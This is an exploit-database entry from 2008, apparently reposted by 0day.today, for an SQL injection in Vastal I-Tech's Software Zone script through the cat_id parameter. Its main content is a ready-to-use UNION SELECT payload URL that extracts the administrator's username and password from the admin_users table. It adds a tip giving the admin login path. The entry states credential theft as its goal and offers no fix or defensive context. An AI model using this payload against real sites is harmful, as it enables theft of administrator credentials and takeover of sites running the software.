id: 2808
date: 04/03/2008
title: Vastal I-Tech Software Zone (cat_id) SQL Injection Vulnerability
author: t0pP8uZz
cves: 

================================================================
Vastal I-Tech Software Zone (cat_id) SQL Injection Vulnerability
================================================================



--==+================================================================================+==--
--==+		         Software Zone SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.vastal.com/software-zone-a-script-for-selling-your-softwares.html
DORK: N/A


DESCRIPTION: 
pull out admin user:pass


EXPLOITS:
http://www.server.com/view_product.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(admin_user,0x3a,admin_password),7,8,9,10,11,12,13,14 FROM/**/admin_users/*


NOTE/TIP: 
administrator login is at /admin/




#  0day.today [2023-03-25]  #